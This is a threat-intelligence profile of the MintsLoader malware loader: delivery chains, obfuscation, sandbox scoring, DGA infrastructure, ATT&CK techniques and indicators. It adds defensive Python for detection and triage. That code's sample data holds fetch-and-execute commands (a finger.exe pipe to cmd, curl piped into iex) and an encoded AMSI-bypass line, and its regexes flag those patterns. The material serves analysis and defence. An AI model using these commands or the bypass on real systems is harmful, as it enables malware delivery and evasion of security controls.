MintsLoader
MintsLoader is a PowerShell-based, multi-stage malware loader, also tracked in reporting alongside TAG-124, LandUpdate808, and UNC4108. It has been observed since at least February 2023 and became more widespread from mid-2024 onward. It affects Windows endpoints and is used to deliver follow-on payloads rather than providing substantial standalone functionality.
Observed delivery vectors include phishing, ClickFix-style social engineering, fake CAPTCHA or verification prompts, and drive-by chains associated with compromised websites and SocGholish-style fake browser updates. Reported phishing themes include invoices, payments, and Italian invoice lures such as JScript attachments named in the format Fattura[0-9]{8}.js. ClickFix activity has included commands pasted into the Windows Run dialog that abuse legitimate binaries such as finger.exe, as well as PowerShell-based execution.
The infection chain is consistently described as multi-stage and commonly JavaScript-to-PowerShell. Observed tradecraft includes use of curl output piped into Invoke-Expression, AMSI bypass, arithmetic string obfuscation, and in newer variants hashtable-based decoding plus reflective loading of Base64-encoded, Gzip-compressed .NET assemblies. MintsLoader also uses deterministic/date-seeded domain generation algorithms to rotate command-and-control infrastructure, including daily-changing C2 domains and numerous .top domains. Researchers reported more than 200 DGA domains across four clusters spanning February 2024 through March 2026.
A key feature of MintsLoader is anti-analysis and victim profiling before payload delivery. Reporting describes WMI-based sandbox checks, VM/GPU/CPU cache checks, and environment scoring used to distinguish likely real machines from sandbox or virtualized environments. In multiple reports, MintsLoader withheld the real payload from sandbox-like systems and instead delivered decoys such as AsyncRAT.
The malware is strongly associated with delivery of the GhostWeaver PowerShell RAT and has also been reported delivering StealC and modified BOINC clients. Reporting states TA582 uses MintsLoader to score targets before delivering GhostWeaver to real machines, while decoy payloads may be sent to analysis environments. GhostWeaver and MintsLoader appear closely integrated, with GhostWeaver reportedly able to redeploy MintsLoader. Additional reporting states UNC4108 utilizes MintsLoader to deploy various payloads, and SocGholish/TA569 adopted MintsLoader around July 2024 as an alternative delivery chain.
Reported targeting includes industrial, legal, and energy organizations in the United States and Europe. Phishing campaigns have targeted the electricity, oil and gas, and legal services sectors. MintsLoader has also appeared in Italy-themed malspam campaigns.
High-confidence infrastructure and artifacts reported include active MintsLoader C2 clusters at 178.156.128.182 and 86.107.101.93 as of March 2026; delivery domains and URLs such as sbwur1[.]top/1.php and gecdfcjcbcmmakk[.]top/9at1biglx5htr.php; ClickFix-related domains such as cfcheckver[.]top and humver[.]top; and published YARA detections for MintsLoader. Reported file and host artifacts from related activity include AppData\Roaming\script.ps1 and scheduled tasks named Google_Maintenance_Worker and Set-SmbServerConfiguration.
Groups observed using it
6 distinct threat actors attributed by public researchers.
MintsLoader (TAG-124 / LandUpdate808 / UNC4108) Type: Malware Loader - PowerShell-based, multi-stage delivery platform
MintsLoader is a malware loader delivering the GhostWeaver RAT via a multi-stage chain using obfuscated JavaScript and PowerShell.
Another recently observed customer of TA569 is the MintsLoader malware family... UNC4108 utilizes MintsLoader to deploy various payloads...
Before the RAT arrives, a profiler called MintsLoader runs three checks on the target machine... When we submitted the delivery URLs to a sandbox, the server connected but withheld the payload.
Loaders like Latrodectus and MintsLoader, which could deliver additional malware and other payloads
Techniques & procedures
22 distinct techniques documented for this family, organized by ATT&CK tactic.
Initial Access
4 techniques
Secondary: Drive-by compromise (SocGholish/TA569). SocGholish operators inject fake browser update overlays on compromised websites. Visitors clicking the "update" download MintsLoader instead of a legitimate browser update.
A typical ClickFix attack begins with threat actors using phishing emails, malvertisements, or compromised websites to lead unsuspecting users to a visual lure... Microsoft Threat Intelligence first observed the use of the ClickFix technique between March and June 2024 in email campaigns sent by a threat actor we track as Storm-1607.
Step 1 - Delivery: JScript Dropper / ClickFix Page
T1566.001, T1566.002, T1189, T1218 | TAG-124, SocGholish/TA569
Phishing email delivers a heavily obfuscated JScript file (Fattura[0-9]{8}.js).
Email contains a link to a fake "Click to verify" page. The page instructs the victim to copy and paste a command into the Windows Run dialog. The pasted command executes finger.exe or PowerShell to download MintsLoader.
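The following is an added example, not code from the page's sources or from Mallory: a small Python hunt that runs the Step 1 delivery patterns above (a finger.exe command piped into cmd, a web request piped into Invoke-Expression, a hidden-window PowerShell launch, and a Fattura[0-9]{8}.js attachment) over process-creation records. The records, hostnames and paths are constructed for the example; the rule names and the explorer.exe parent heuristic are the author's choices, not vendor detection logic.

```python
"""Hunt for MintsLoader-style delivery chains (ClickFix Run-dialog commands,
finger.exe abuse, curl|iex stagers, Fattura*.js lures) in process-creation logs."""
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    parent: str   # parent image name
    image: str    # created process image name
    cmdline: str  # full command line


# Detection rules keyed on the command line. The finger.exe rule catches the
# "finger <user>@<host> | cmd" shape described above; the iex rule catches
# curl/Invoke-WebRequest output piped straight into Invoke-Expression.
RULES = [
    ("finger_piped_to_cmd",
     re.compile(r"\bfinger(?:\.exe)?\b[^|]*\|\s*cmd\b", re.I)),
    ("web_request_piped_to_iex",
     re.compile(r"\b(?:curl|iwr|irm|invoke-webrequest|invoke-restmethod)\b.*\|\s*(?:iex|invoke-expression)\b", re.I)),
    ("hidden_window_powershell",
     re.compile(r"-w(?:indowstyle)?\s+hidden\b", re.I)),
    ("fattura_jscript_lure",
     re.compile(r"\bFattura\d{8}\.js\b", re.I)),
]


def evaluate(event: ProcEvent) -> list[str]:
    """Return the names of all rules whose pattern matches the event's command line."""
    return [name for name, rx in RULES if rx.search(event.cmdline)]


def hunt(events):
    """Score events: a hit whose parent is explorer.exe (what the Run dialog and a
    double-clicked attachment spawn) is rated high, anything else medium."""
    findings = []
    for ev in events:
        hits = evaluate(ev)
        if hits:
            severity = "high" if ev.parent.lower() == "explorer.exe" else "medium"
            findings.append({"image": ev.image, "hits": hits, "severity": severity})
    return findings


# Constructed sample events (not real telemetry; hosts use documentation ranges).
SAMPLE_EVENTS = [
    ProcEvent("explorer.exe", "cmd.exe",
              "cmd /c finger user@203.0.113.10 | cmd"),
    ProcEvent("explorer.exe", "powershell.exe",
              'powershell -w hidden -c "curl -useb http://example.invalid/1.php | iex"'),
    ProcEvent("explorer.exe", "wscript.exe",
              'wscript.exe "C:\\Users\\victim\\Downloads\\Fattura12345678.js"'),
    ProcEvent("services.exe", "powershell.exe",
              "powershell -File C:\\scripts\\backup.ps1"),
    ProcEvent("explorer.exe", "cmd.exe", "cmd /c ipconfig /all"),
]

if __name__ == "__main__":
    for f in hunt(SAMPLE_EVENTS):
        print(f["severity"], f["image"], ", ".join(f["hits"]))
```

The explorer.exe parent is what a Run-dialog paste or a double-clicked attachment produces; in production telemetry you would also key on the grandparent (a browser for ClickFix chains) and on the outbound connection finger.exe makes, because the pasted command text itself can be varied freely by the operator.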
Execution
5 techniques
Step 2 - Execution: PowerShell Stager (MintsLoader Core)
T1059.001, T1562.001, T1027, T1140 | MintsLoader
The HTTP response returns a Base64-encoded, XOR-encoded payload that the stager decodes.
"Whatever text that server returns is then piped straight into cmd for immediate execution."
"Injected JS: fake browser update prompt"; "ChrоmeUpdаteInstаller.js"; "JS stager"
The ClickFix technique attempts to trick users into running malicious commands on their devices... It typically gives the users instructions that involve clicking prompts and copying, pasting, and running commands directly in the Windows Run dialog box, Windows Terminal, or Windows PowerShell.
The victim pastes and runs the command, which downloads and executes a second-stage payload.
Privilege Escalation
1 technique
Stealth
7 techniques
Obfuscation uses arithmetic character encoding: every string is built from math expressions without [char] casts, e.g. @((8306-8191),(7691-7583),...) -join ''.
However, whether the malware is on disk or in memory, we’ve observed its code injected into LOLBins, such as msbuild.exe, regasm.exe, or powershell.exe.
The HTTP response returns a Base64-encoded, XOR-encoded payload. Once decoded and decompressed, the heavily obfuscated PowerShell bypasses AMSI.
These abuse finger.exe - a legitimate Microsoft-signed binary from the obsolete Finger protocol. It remains on modern Windows, is rarely monitored, and can make outbound network connections. The piped output goes directly to cmd for execution.
"including sandbox detection, virtual machine detection" / "Checks for virtual machine/sandbox environments using obscure logic and system metadata"
Step 3 - Evasion: WMI Environment Scoring
Three WMI checks produce a cumulative score that determines whether the C2 serves the real payload or a decoy.
"...executed it in memory..."; "...keeping the entire chain in memory..."; "...runs the returned PowerShell directly in memory." | "A base64-encoded, Gzip-compressed .NET assembly was unpacked in memory and invoked via reflection."; "...loads... using System.Reflection.Assembly::Load ... identifies its Main method and invokes it via reflection..."
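An added example (not MintsLoader code and not from any of the reports quoted above) of the triage steps an analyst applies to the Step 2 and Stealth artifacts: decoding the arithmetic character encoding into literals, reversing the Base64 + Gzip wrapping of an embedded .NET assembly and checking for a PE header, and flagging what the decoded text exposes. The sample script, the decoded string, the assembly stand-in and the indicator list are constructed for this example; the decoded field name is the one used by a widely published AMSI bypass and is not asserted to be MintsLoader's, and the [char]-cast variant the regex also accepts goes beyond the cast-free form the page quotes.

```python
"""Triage helpers for MintsLoader-style PowerShell stages: decode
arithmetic-encoded strings, unpack a Base64 + Gzip blob and check for a PE (MZ)
header, then flag indicators that the deobfuscated text exposes."""
import base64
import gzip
import re

# A PowerShell array of integer subtractions joined into a string, with or
# without a [char] cast on each term:  @((8306-8191),(7691-7583),...) -join ''
ARITH_ARRAY = re.compile(
    r"@\(((?:\s*(?:\[char\])?\s*\(\s*\d+\s*-\s*\d+\s*\)\s*,?)+)\)\s*-join\s*''", re.I)
TERM = re.compile(r"\(\s*(\d+)\s*-\s*(\d+)\s*\)")

# Indicator names are this example's own; they are not a vendor rule set.
INDICATORS = [
    ("amsi_init_failed_bypass", re.compile(r"amsiInitFailed", re.I)),
    ("invoke_expression", re.compile(r"\b(?:iex|invoke-expression)\b", re.I)),
    ("reflective_assembly_load", re.compile(r"Reflection\.Assembly\]::Load\b", re.I)),
]


def decode_arithmetic_string(terms: str) -> str:
    """Evaluate each (a-b) term as a code point; integer arithmetic only, no eval()."""
    return "".join(chr(int(a) - int(b)) for a, b in TERM.findall(terms))


def deobfuscate_script(script: str) -> str:
    """Replace every arithmetic-encoded array with the single-quoted literal it builds."""
    def repl(m):
        literal = decode_arithmetic_string(m.group(1)).replace("'", "''")
        return "'" + literal + "'"
    return ARITH_ARRAY.sub(repl, script)


def triage(script: str):
    """Deobfuscate, then return (clean_script, indicator names found in it)."""
    clean = deobfuscate_script(script)
    return clean, [name for name, rx in INDICATORS if rx.search(clean)]


def wrap_b64_gzip(data: bytes) -> str:
    """Apply the Gzip + Base64 wrapping the loader reverses (used to build samples)."""
    return base64.b64encode(gzip.compress(data)).decode()


def unpack_b64_gzip(blob_b64: str):
    """Reverse the Base64 + Gzip wrapping of an embedded stage and report whether
    the result starts with a PE 'MZ' header (a .NET assembly is a PE file)."""
    raw = gzip.decompress(base64.b64decode(blob_b64))
    return raw, raw[:2] == b"MZ"


# Constructed sample (not a real MintsLoader stage): the array decodes to
# "amsiInitFailed", the field name used by a widely published AMSI bypass; it
# includes the two terms quoted on the page, the rest are built the same way.
SAMPLE_SCRIPT = (
    "$f = @((8288-8191),(8300-8191),(8306-8191),(8296-8191),(8264-8191),(8301-8191),"
    "(7688-7583),(7699-7583),(7653-7583),(7680-7583),(7688-7583),(7691-7583),"
    "(7684-7583),(7683-7583)) -join ''; "
    "[Ref].Assembly.GetType($t).GetField($f,'NonPublic,Static').SetValue($null,$true)"
)
# Constructed stand-in for an embedded assembly: MZ header plus filler bytes.
FAKE_ASSEMBLY = b"MZ" + b"\x00" * 62 + b"not a real .NET assembly"
SAMPLE_BLOB = wrap_b64_gzip(FAKE_ASSEMBLY)

if __name__ == "__main__":
    clean, hits = triage(SAMPLE_SCRIPT)
    print(clean)
    print("indicators:", hits)
    raw, is_pe = unpack_b64_gzip(SAMPLE_BLOB)
    print("unpacked", len(raw), "bytes, MZ header:", is_pe)
```

Decoding the strings with integer arithmetic rather than handing the script to PowerShell keeps the triage safe to run on an analysis box, and the MZ check is the quickest way to confirm that an unpacked blob is the assembly the reflective Load stage expects rather than a further PowerShell layer.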
Discovery
4 techniques
"User $env:COMPUTERNAME"; "Callback: POST http://{DGA4}/htr.php?id={hostname}"
"It pulls the local hostname from $env:COMPUTERNAME... included in the query string to support tracking..."
Command and Control
3 techniques
"...PHP based staging via a 1.php?s=<GUID> endpoint..."; "...request to the /st2 path..."
ATT&CK Mapping Technique ID Chain Phase ... Ingress Tool Transfer T1105 Payload delivery
Step 4 - C2 Resolution: Domain Generation Algorithm
T1568.002 | MintsLoader, GhostWeaver
Four distinct DGA algorithms across kill chain stages.
Other
1 technique
IOCs tracked for this family
71 indicators attributed across vendor reports, sandbox runs, and researcher write-ups.
Recent activity
26 sources tracked across advisories, community write-ups, and news.
PowerShell-based multi-stage malware loader that uses JavaScript-to-PowerShell infection chains, DGA-based C2 resolution, and WMI anti-sandbox scoring to deliver follow-on payloads including GhostWeaver, StealC, and modified BOINC clients.
A loader malware family distributed via KongTuke, noted as leading to Broomstick/WarmCookie payloads.
Pre-delivery profiling/loader component used to gate GhostWeaver delivery by scoring host characteristics (VM presence, GPU type, CPU cache levels) to detect sandboxes and withhold or alter payload delivery; scoring constants are tunable per deployment without changing the core algorithm.
Multi-stage PowerShell loader/profiler used to triage victims (VM/GPU/CPU cache checks) and apply an AMSI bypass before routing low-score (real) hosts to GhostWeaver and high-score (sandbox) hosts to decoys; uses DGA-based infrastructure and callback scoring to control payload delivery.